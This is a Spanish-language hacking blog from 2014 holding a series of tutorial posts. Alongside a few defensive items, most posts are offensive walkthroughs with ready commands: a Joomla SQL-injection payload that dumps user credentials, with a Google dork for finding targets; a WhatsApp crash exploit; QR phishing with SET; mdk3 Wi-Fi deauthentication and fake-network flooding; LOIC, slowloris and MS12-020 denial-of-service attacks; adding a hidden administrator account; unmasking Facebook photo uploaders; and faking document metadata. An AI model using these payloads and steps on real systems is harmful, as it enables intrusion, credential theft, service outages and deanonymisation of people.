viernes, 26 de diciembre de 2014

Reto Estenografia Navidad


Para terminar este intenso 2014 presento un reto de Defcon-Gt_Pe.

La imagen de la modelo que veis a continuación contiene un mensaje oculto en su archivo original, el premio (VPN Premium hasta 2015) para el primero que enviara un correo a los organizadores, aunque la competición se haya acabado es ideal para tomársela de entrenamiento o reto.

candice



La esteganografia es el arte de ocultar /desvelar mensajes de todo tipo de archivo mientras que la criptografía esconden un mensaje visible pero cifrándolo o codificándolo.

El reto es ideal para todo aquel que se quiera iniciar en este mundillo,  no siendo muy difícil el reto si se tienes conocimientos básicos en el campo.

Descargar la imagen para empezar con el reto.


Publicar quien consiga llegar hasta el final o si no podéis llegar hasta el final para ayudaros entre vosotros. El día 31 por la mañana en España subiré una solución.


Happy hacking!!

martes, 2 de diciembre de 2014

Hack Whatsapp diciembre 2014


Hoy ha llegado a mis manos la alerta sobre una vulnerabilidad de "Denegación de Servicio", descubierta por 2 hackers indios, Indrajeet Bhuyan y Saurav Kar de tan solo 17 años de edad.

A si que me he puesto a ello, conseguiendo el código en Pastebin y he probado con un pequeño laboratorio.

Hemos usado 3 móviles con Android en versiones 4.0.4 , 4.2 y 4.4 con MIUI, y en las 3 hemos obtenido los mismos resultados.

¿Cual es el exploit usado?
El código de 1290 palabras, es un texto con caracteres en formato Unicode que al pasarlo a una persona o grupo colapsa el terminal totalmente unos segundos y para el servicio de Whatasapp.
código en Unicode
Código de inyección en Pastebin



Prueba de concepto:
Se crea un grupo con X personas: 
whatsapp test


Al enviarlo el código este colapsa los servicios de whatasapp de los otros 2 miembros del grupo, con lo que les obliga a cerrar el whatsapp.

Y pueden volver a entrar pero cuando vuelven a intentar entrar 

hack enviado



Prueba de concepto grabada en Laboratorio.




El exploit en Pastebin: http://pastebin.com/3efiBva4


¿Como recupero el grupo o contacto?
Lo que hay que conseguir ese mensaje suba hasta llegar a "Cargar mas" para ello podemos usar varios metodos:

1. Usando una aplicación externa para enviar mensajes a ese grupo o persona, también funciona enviando fotos desde la galeria y pulsando enviar por whatsapp. Con 2 imagenes es suficiente. (Pero si subimos para arriba se nos volvera a colapsar, con que no podemos ver el histórico de lo sucedido antes de ese mensaje).
conversacion hack


2. En caso de grupos, el administrador puede cambiar el nombre del grupo tantas veces como haga bajar el código sobre 20 cambios hay que hacer.



3. Eliminar conversación.


Saludos y sed buenos, no se hasta que punto haciéndolo a una persona ajena puede cometerse delito.

Whatsapp debe estar trabajando en ello con que probablemente en unas horas o mañana saquen el parche de seguridad.


**Esta práctica no tiene intenciones maliciosas, es un entorno de laboratorio controlado por el administrador, el cual es usado para aprender sobre las tecnologías, concienciar de los peligros de sus usos y poder revertir este ataque con las soluciones aportadas.

martes, 26 de agosto de 2014

Ataque por QR malicioso


Hoy vamos a realizar un ataque por un codigo QR malicioso.

Vamos a montar un codigo QR que envie a la victima al escanearlo a un sitio malicioso por ejemplo, pero haciéndose pasar por una oferta de descuento para un espectáculo. 

Lo mas usado seria montar una pagina con parecido dominio a la que queremos suplantar e infectar con una descarga de un APK malicioso, un applet de Java malicioso u otra vía de ataque como un login de "facebook" que dijera que hay que loguearse para acceder al contenido, pero eso ya es lo que tengais en mente.



Para empezar abrimos nuestro Kali Linux y en la consola escribimos: setoolkit.


1) Social-Engineering Attacks
9) QR code generator Attack vector
X) Escribimos la pagina a la que queremos que nos mande el codigo QR.


Ahora movemos la foto del Qr al escritorio:
cp /root/.set/reports/qrcode_attack.png /root/Desktop



Y por ultimo podemos generar nuestro timo aplicando nuestros conocimientos de ingeniería social, haciéndonos pasar por la oferta de un cine.


Saludos guerreros y Happy Hacking!

viernes, 22 de agosto de 2014

como quitar publicidad de internet y anuncios de youtube


Vamos a aprender a como quitar la publicidad en las paginas de Internet, que tanto dinero estan ganando los grandes sitios con esta y los molestos anuncios de youtube como anuncio previo, barra abajo, corte a mitad del video y todas las nuevas artimañas de ganar dinero.

La herramienta que usaremos sera Adblock Plus que la podeis encontrar en su pagina oficial https://adblockplus.org ,y que esta desarrollada para Google Chrome, Mozilla Firefox, Internet Explorer, Safari, Opera y el navegador de Android


El funcionamiento es facil, Adblock crea un puerto de escucha por ejemplo el 8080, y todo el trafico se recibe por alli comparando los objetos recibidos con sus listas de publicidad, si esta esta incluida o tiene sospechas sera bloqueada y por lo tanto no la veremos.

esquema facil filtro adblock
Esquema funcionamiento Adblock Plus


Otra de las grandes opciones de Adblock es sus funcionalidades extras. Pero la que mas me impacto es la de "desactivar seguimiento" para evitar enviar informes sobre tus clicks y búsquedas, en teoría navegas anónimo.



Y como me sentía con ganas he hecho una prueba de concepto donde vemos como se bloquean los anuncios de un importante periódico deportivo español y otra sobre como saltar anuncios de youtube.


Espero que os guste, y dejemos de perder el tiempo con anuncios.


lunes, 18 de agosto de 2014

Inyecciones de redes wifis


En el tutorial de hoy vamos a aprender a inyectar a un objetivo redes wifis falsas, la metodología es facil, escanear redes, fijar una victima y generar wifis con nombres aleatorios para esa victima.

¿Quieres saber como se hace? Aquí tenéis un tutorial paso a paso con el sistema operativo Kali Linux en linea de comandos.


1º Ponemos la tarjeta en modo monitor: airmon-ng start  wlan0
airmon tarjeta monitor

2º Lo primero sera empezar a capturar. En mi caso me enfocare en la wifi Mznlabsec. airodump-ng mon0
captura wifis cercanas airodump-ng


Aquí os dejo una explicación para el que sea la primera vez que maneja airodump.
airodump por partes



En el caso que queramos capturar solo trafico de Mznlabsec. airodump-ng -c 7 --bssid 5c:33:8E:A7:D4:B8 mon0
airodump especifico



Ahora vamos a hacer el primero de los ataques que consiste en desautentificar a la victima en nuestro caso sera un ordenador con MAC 70:F3... pero pondriamos varias victimas.

Escribimos la MAC en un fichero txt con: echo 70:F3.... >> victima.txt
Podemos ver lo que hay en el fichero con: cat victima.txt

Y procedemos a desautentificar a la victima: mdk3 mon0 d -b victima.txt
desautentificar victima con mdk3


El segundo ataque sera el de inyectar wifis falsas, usando tambien mdk3, así que escribimos: mdk3 mon0 x 1 -c 70:F3... -t 5c:33:8E:A7:D4:B8

Y procedemos a inyectar con: mdk3 mon0 b
wifis falsas inyectando

Ahora cuando veamos desde la victima las wifis disponibles veremos el gran numero de wifis falsas insertadas a la victima.
victima viendo wifis


Espero que os haya gustado y Happy hacking!!

sábado, 16 de agosto de 2014

como adivinar autor de una foto en facebook


Hoy voy a explicar como saber el autor de una foto en facebook de las paginas static de facebook mediante una practica-ejemplo.

La practica consiste en seleccionar una foto de un facebook de alguien, coger la url de fbcdn-sphotos y descubrir la cuenta desde la que se subió.


Así que vamos al lío.

Para empezar seleccionamos un perfil de algún famoso para la primera practica, y con el botón derecho "abrir imagen en una pestaña nueva".


kilian facebook hack
Fotografía en una pestaña nueva.


En la URL nos fijamos que esta divida en 3 partes, nos interesa la parte central, es detectable pues esta entre barras bajas.

Ahora en una nueva pestaña, escribimos https://facebook.com y pegamos esa parte seleccionada.

URL perfil autor foto


Y vemos que nos redirecciona a esa misma foto.
rastreo foto facebook
Autor del momento que subio la foto

Como mencione solo sirve para cuentas de facebook configuradas como publicas o que estando logueado podrías tener acceso. Si no saldría como que esta roto o borrado.


facebook privado no disponible
Perfil del autor no accesible


Ahora que hemos visto como funciona el proceso desde 0 vamos a realizar la practica con la pagina reddit, en la que vamos a buscar con este mismo proceso autores de fotos subidas. 

Así que vamos a reddit y filtramos por uno de los dominios de fotos de facebook:
http://www.reddit.com/domain/scontent-b-fra.xx.fbcdn.net
http://www.reddit.com/domain/fbcdn-sphotos-d-a.akamaihd.net

reddit facebook fotos
Búsqueda de una imagen random en reddit

Y con el proceso explicado, abrimos la foto y buscamos a su autor.
shrek rastreado
Salio el artista del shrek

Este simple truco nos puede ayudar en fotos que busquemos al autor por diversos casos tanto por cotilleo, curiosidad, casos de bullying, abusos, drogas o lo que os podáis imaginar.

Saludos guerreros!

viernes, 15 de agosto de 2014

Manejando usuarios con el cmd



Vamos a aprender como administrar usuarios en todas las versiones de windows mediante la consola de comandos.

Lo primero que haremos sera abrir el cmd, ejecutando como administrador, pudiendo así acceder a opciones bloqueadas para cmd estandar.

Esto es muy útil para ver cuentas ocultas en el sistema, hacer alguna broma, administrar cuentas fácilmente y rápidamente, también es usado cuando conseguimos una shell por ejemplo con Metasploit y mucho mas, así que es importante repasarlo.



Lo primero básico que vamos a ver es a consultar quien soy: whoami

Ahora veamos todos los usuarios de la maquina: net user

Añadimos un usuario: net user huevo /add  
Para borrarlo: net user huevo /del

Vemos quien esta en el grupo administradores: net localgroup administradores
Añadimos huevo al grupo administradores: net localgroup administradores huevo /add

Añadir a huevo una contraseña: net user huevo gallina

Saludos!!

Exploit Joomla 1.5 simplephotogallery


Hoy me tocaba trabajar auditando un Joomla 1.5 y buscando exploits encontré este usado en paginas webs hechas en Joomla que permite conseguir el user y password (cifrada en MD5).

Así que como no tengo nada mejor que hacer os explico como se hace.

Lo primero es buscar una pagina web con el modulo simplephotogallery, si no tenemos un objetivo fijado podemos usar un dork tal que así:

inurl:"index.php?option=com_simplep­hotogallery"


Dork para buscar objetivos


Si consultamos el código fuente veremos que efectivamente usan este modulo simplephotogallery.


Ahora mediante SQL Injection, que es una técnica que trata de inyectar sentencias SQL a la base de datos para conseguir información que no devolvería por defecto la aplicación, intentaremos sacar los usuarios y contraseñas.


index.php?option=com_simplephotogallery&view=images&albumid=-1+/*!uNiON*/+/*!SeLeCt*/+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+jos_users--+

La galeria en estado normal


Y cuando lo inyectamos en la pagina este es el resultado.
Inyección con éxito

Con lo sacado tenemos: el admin y la password cifrada, estudiando un poco como se componía. He visto que los primeros joomla 1.5 estaban directamente en cifrados con MD5 pero en versiones posteriores esto se mejoro guardando las contraseñas así:

function password($password){
 $salt = md5(mt_rand());
 $encrypt = md5($password.$salt);
 return $encrypt.':'.$salt;
}

Herramientas como hashcat, utilizado para crackear claves, podrían con este método de $password + salt, introduciendo un diccionario y probando las combinaciones. El próximo tutorial ira de como manejarlo y así complementar esta parte.


Saludos guerreros!!

martes, 12 de agosto de 2014

Como defenderse de arp poison


En muchos ataques hemos aprendido como envenenar las tablar ARP para que pase el trafico por un ordenador antes que salga por el router todo el trafico.

Para ver si somos victima, podemos hacer un tracert www.google.com y si vemos que el primer salto no es la ip del router casi seguro estamos ante un MITM (Man In The Midlde).

El arp poison es el ataque mas común de los diferentes tipos MITM, consiste en mandar peticiones a la victima diciendo que el atacante ahora es el router, con lo que el trafico pasara por él antes de salir al exterior.


tracert MITM
Victima de ataque MITM por arp poison


Para evitar esto podemos usar Patriot-ng y Marmita, pero para cortar de raíz el problema lo mejor es poner la dirección del router de forma estática y aunque recibamos un ataque por arp poison no conseguirá cambiar la tabla arp.

Para hacer esto haremos lo siguiente.
Abrir una consola con permisos de administrador.
Ver la tabla actual con arp -a
Ver la ip y mac del router
Hacerla estatica

arp -s [ip router] [mac router]
arp -s 192.168.1.1 00-11-22-33-44-55

arp table
Tabla arp estatica

Con este simple truco estaremos seguros contra este tipo de MITM sobre todo si nos conectamos en redes publicas.

Si queremos revertir el proceso y volverlo dinámico haremos:
arp -d 192.168.1.1


Saludos guerreros!!

Estreno canal de Youtube


Mis ganas por empezar en el mundo de youtube con la seguridad informática era ya grande, así que ayer monte un pequeño vídeo tutorial de un ataque "Phising Web con SET en Kali Linux", donde robaba la cuenta de gmail de una victima que se conectaba a mi.

Mi experiencia en el mundo de editar vídeos para otras temáticas esta ya consolidada y me encanta a pesar del tiempo que hay que invertir para publicar algo bueno y que interese.

Los vídeos los iré subiendo cuando saque algunas horas, sobretodo este mes de Agosto se sacaran varios, así que estad atentos que serán cortitos e intensos.

Se que tiene muchos fallos el vídeo y poco a poco iré mejorando, sobre todo con el audio.


Saludos guerreros!

lunes, 11 de agosto de 2014

Wifite tutorial



Wifite es un programa para auditar redes wifi, wifite ofrece un ataque automático haciendo ataques a medida para el tipo de protección minimizando la interacción del usuario.

Wifite v2 viene integrado en Wifislax en sus ultimas versiones, pero corre en sistemas Linux entre ellos es usado en Kali Linux, Blackbox y otras suites de pentesting.


wifite wifislax
Captura redes sin filtro.

Vamos a hacer una pequeña practica del potencial de Wifite y lo fácil que es de usar desde Wifislax.

Para iniciarlo iremos desde Inicio: Wifislax > Wireless > Wifite2 o escribir en una consola: /usr/bin/wifite.py


Si el objetivo es una red wifi con protección WEP, wifite ira haciendo los ataques mas famosos, como aireplay-ng, chop-chop attack, fragmentation attack, caffe-late attack y p0841 attack.

Hacking WEP 


Para WPA / WPA2 utilizara el famoso ataque mediante WPS tanto por pines por defecto o fuerza bruta para conseguir la contraseña sino pasara a intentar capturar el handshake y crackear la contraseña.


Como podéis comprobar es todo automático una vez seleccionado a quien quieres atacar o si quisieras probar con todas las wifi capturadas, dando un resumen de los ataques completados asi como las contraseñas de aquellos con éxito.

Link al proyecto en Github.

Saludos guerreros!.


lunes, 21 de julio de 2014

Curso de iniciacion a la seguridad informatica


Después de casi un año volcado en el mundo de la seguridad, aprendiendo muchos truquillos he decidido dar el salto y pasar al camino de la educación.

Tenia ganas de dar un curso de iniciación, para gente que de normal use ordenadores olisqueen un poco en algunos de los temas mas destacados de la seguridad.

En colaboración con el Nuevo Espacio Joven de Monzón (Huesca), son los que han aceptado con los brazos abiertos la idea cediendo una sala completamente habilitada para dar el curso y el material que necesitamos.

El curso no tiene ningún tipo de coste para el alumno, ya que se minimizaran cualquier coste de fotocopias y el único coste sera el DVD grabado de Wifislax.

Para inscribirte necesitas tener de 15 a 20 años, que te guste la informática y ganas de aprender, apuntarse en la oficina del Nuevo Espacio Joven de Monzón en el parque de la Azucarera o en el 974 417 742.

El temario de los dias aún no esta cerrado definitivamente quedando a dia de hoy asi:
1º Analisis forense
2º Malware
3º Wifi
4º Ataques en red local
5º A decidir entre todos.


lunes, 30 de junio de 2014

DOS con LOIC kali linux


En plena #OpCupBrazil seguimos analizando los programas que usa Anonymous, hoy toca uno de los mas famosos, es LOIC mas orientado al DDOS (Denegación de servicio Dirigida).

LOIC son las siglas de Low Orbit Ion Canon,  que se dio a la fama como un arma cibernetica capaz de disparar a su objetivo y colapsando el trafico del objetivo y capaz de cordinarse por canales IRC con otras permitiendo un ataque conjunto.


-
aptitude install git-core monodevelop


Ahora crearemos una carpeta en el escritorio donde instalaremos loic
cd Desktop Nos movemos al escritorio
mkdir loic creamos una carpeta llamada loic
cd loic
wget https://raw.github.com/nicolargo/loicinstaller/master/loic.sh
loic download


chmod 777 loic.sh Elevamos privilegios de loic.sh a rwxrwxrwx.
./loic.sh install 
apt-get install mono-gmcs Instalamos el motor grafico.
./loic.sh run
loic start


Vamos a configurarlo.

Señalamos la opción " Append random chars..." 

URL: Introducimos el sitio web a atacar y presionamos "Lock on".

Method: Usaremos UDP al no tener que tener que establecer una conexión pactada y ser el trafico unidireccional entre ambas maquinas y deberemos de tener cuidado porque mostramos nuestra ip.

Threads: Configuraremos 50 hilos.


loic start


Probaremos el laboratorio en una pagina que hemos preparado para esto.
website up loic


Y un minuto después de empezar a bombardearlo la pagina se queda inoperativa.
website loic down




**Esta práctica no tiene intenciones maliciosas, es un entorno de laboratorio controlado por el administrador, el cual es usado para aprender sobre las tecnologías, concienciar de los peligros de sus usos.

jueves, 26 de junio de 2014

DOS con slowloris


Los ataques DOS (Denial Of Service) sirven para dejar fuera de servicio un equipo o dispositivo, como bien sabéis.

Hoy vamos a realizar una practica en red local, donde queremos colapsar el acceso al router, para eso nos apoyaremos de slowloris, un programa que se ha puesto de moda estas ultimas semanas por ser usado por Anonymous en la #OpCupBrazil

Lo primero sera crear el script: Codigo Slowloris, este codigo lo pegamos en un documento vació y lo guardamos con extension pl (slowloris.pl).

Mi objetivo a tumbar es un router domestico, del que no quiero que nadie pueda acceder, y que esta protegido frente a ataques DOS.


Abrimos una consola, lo primero sera hacer un ping que tenemos conexión hacia el: ping 192.168.1.1

Ahora lanzaremos slowloris:
./slowloris.pl -dns 192.168.1.1 
slowloris DOS router
Ataque a un router con slowloris


Slowloris envia una cantidad de paquetes, entre 450-550 paquetes y duerme minuto y medio, y vuelve a atacar así todo el rato, lo que provoca una denegación de servicio mas eficaz y mas difícil que haga saltar las alarmas.

router down
Router fuera de servicio




**Esta práctica no tiene intenciones maliciosas, es un entorno de laboratorio controlado por el administrador, el cual es usado para aprender sobre las tecnologías, concienciar de los peligros de sus usos y saber actuar frente a estos ataques.

lunes, 2 de junio de 2014

DOS por control remoto



Hoy vamos a practicar con una vulnerabilidad que afecta al control remoto en sistemas Windows, concretamente a las versiones de Windows 7 , 2003 server, 2008 server, 2008 r2 server y XP que no han sido parcheadas.


El escenario consta de 2 maquinas: una es el atacante con Kali Linux de sistema operativo y la otra sera un windows Ultimate limpio sin actualizaciones.


La vulnerabilidad fue catalogada como: MS12-020, solucionando la vulnerabilidad de ejecución remota de código al servidor de Terminal Server, con lanzamiento del parche el 13 de Marzo de 2012.


Para esta vulnerabilidad se necesita tener una opción especifica, que es la de permitir las conexiones desde equipos que ejecuten cualquier versión de Escritorio remoto (menos seguro). La primera no dejara pues esta vulnerabilidad necesita tener habilitado Escritorio remoto y la 3º es identificación a nivel de red con lo que no tendríamos paso al equipo.

escritorio remoto vulnerable
Equipo vulnerable 


Ahora desde nuestro Kali Linux procederemos a atacar:

Lo primero sera poner en marcha metasploit, así que abrimos una consola y escribimos: msfconsole

Para buscar el exploit, haremos: search ms12-020
search ms12-020


Ahora lo cargaremos:
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

Para ver las opciones que tenemos: show options
Configuramos la maquina de la victima con: set RHOST 192.168.1.X

use exploit metasploit


Y por ultimo lo ponemos a funcionar con exploit o run.

Lo que estamos haciendo es enviar un paquete con unas características concretas a la victima por el puerto 3389 (Por defecto), y luego hace la conexión con lo que provoca que la maquina caiga.

exploit o run


Como vemos la victima sufre la pantalla azul de la muerte, originada por RDPWD.SYS, que es el driver del control remoto.

blue death screen
Blue death screen


Solución a esta vulnerabilidad.
La mejor solución es instalar las actualizaciones que Windows te sugiere, pues muchas de estas son instaladas en los equipos que las tienen actualizadas con lo que el margen que estas inseguro publicamente es bastante reducido.

Tambien se puede arreglar mediante un Fix it, oficial de Microsoft. No pretende ser un sustituto a la actualización pero tapara la vulnerabilidad. 



Happy Hacking!!

sábado, 31 de mayo de 2014

Limpiar metadatos en PDF


Hoy explicaremos como limpiar metadatos en archivos .PDF.


Los metadatos son los datos de los datos, es decir, datos que asocian a un otro dato (fichero). Ficheros de Words, Excels, Pdfs, imagenes y otros pueden contener de estos metadatos. 



Los metadatos nos pueden ayudar a encontrar antes un archivo o a organizar una serie de documentos.

metadatos doc
Búsqueda por un autor en un documento

Si examinamos ficheros con FOCA vemos estos metadatos a veces ocultos a nuestros ojos y no apreciables desde los detalles
pdf datos ocultos


Desde el punto de vista normal son buenos, pero al ser datos que aveces no se les presta atención y pueden contener información que nos podría perjudicar, por ejemplo:


Un trabajo de clase que entregamos al profesor y lo hemos descargado de internet o nos ha pasado el archivo un compañero, aunque hemos cambiado partes del fichero y lo hemos renombrado, pues en estos metadatos pueden ir guardados el autor que creo el trabajo y con que fecha. Con lo que podría volverse en tu contra.



Pero el caso mas famoso de escándalos con metadatos, fue con Tony Blair y el Gobierno Británico, puedes leer aquí el hackeo memorable.





Vale ahora ya sabemos como encontrarlos en nuestros ficheros, con lo que vamos a aprender a borrarlos o alterarlos.

La herramienta que yo usare para este proceso en PDF sera BeCyPDFMetaEdit, sencilla y eficaz.


metadatos pdf

Para eliminarlo tendremos que presionar "Clear All Fields" y en la pestaña Metadata(XMP) si hubiera algo borrarlo.



Ahora lo volveremos a analizar con FOCA para ver si tenemos el documento limpio y ya podriamos subirlo a Internet o enviarlo.

pdf sin metadatos
Limpio de metadatos 



También podemos modificarlos si nuestro objetivo es hacer creer a las personas datos falsos.

metadatos modificados

Los metadatos han sido muy relevantes estos ultimos años, sobretodo para desvelar quien creo un documento.

Otra historia interesante sucedió con Alex Tapanaris en 2012, miembro de Anonymous y que publico un documento llamado: an0nymous como nota de prensa, pero se le olvido revisar los metadatos y allí apareció su nombre y el FBI en su puerta.


Espero que os guste, este pequeño manual y poco a poco voy recobrando el blog.

Happy Hacking!!